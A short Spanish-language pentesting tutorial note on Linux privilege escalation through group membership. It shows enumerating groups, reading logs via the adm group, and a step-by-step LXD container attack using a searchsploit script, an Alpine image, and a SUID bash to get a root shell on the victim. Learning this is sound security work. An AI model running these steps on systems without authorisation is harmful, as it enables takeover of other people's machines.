Group Abuse

Linux privilege Escalation

En Linux, los grupos son entidades que permiten agrupar usuarios para gestionar permisos y acceder a recursos de manera más eficiente. Al crear un grupo y asignar usuarios a él, se puede otorgar a ese grupo ciertos permisos sobre archivos, directorios o dispositivos, y todos los usuarios pertenecientes al grupo heredan esos permisos.

con el comando "id" podremos enumerar nuestros grupos

id

despues de esto podemos buscar formas de explotar las funciones que nos dan estos grupos, aquí hay algunos ejemplos con grupos específicos :

Ejemplo de abuso con ADM

• ADM es un grupo que nos permite leer los logs del sistema

ls -l /var/log
find /var/log -group adm 2>/dev/null # listar logs que podemos ver con adm

• en estos logs puede ser posible enumerar alguna información confidencial o critica

Ejemplo de abuso con LXD

• LXD es un servicio similar a Docker que nos permite crear y gestionar contenedores

también podemos abusar de monturas para conseguir una consola de root

searchsploit lxd
searchsploit -m /linux/local/46978.sh # es un script de s4vitar que hace el proceso automatico
mv 46978.sh privesc.sh

en nuestra maquina de atacante descargamos este recurso y a partir de esa imagen crear un contenedor

bash build-alpine

• debes ejecutarlo todo como root, por eso lo estamos haciendo primero en la maquina atacante

• el comprimido que sea creado deberás pasarlo a la maquina victima junto al script privesc.sh

./privesc.sh -f nombre_del_comprimido

automáticamente te dará una consola como root

chmod u+s bash (en el contenedor)

bash -p (en la maquina victima)

y tendremos la consola como root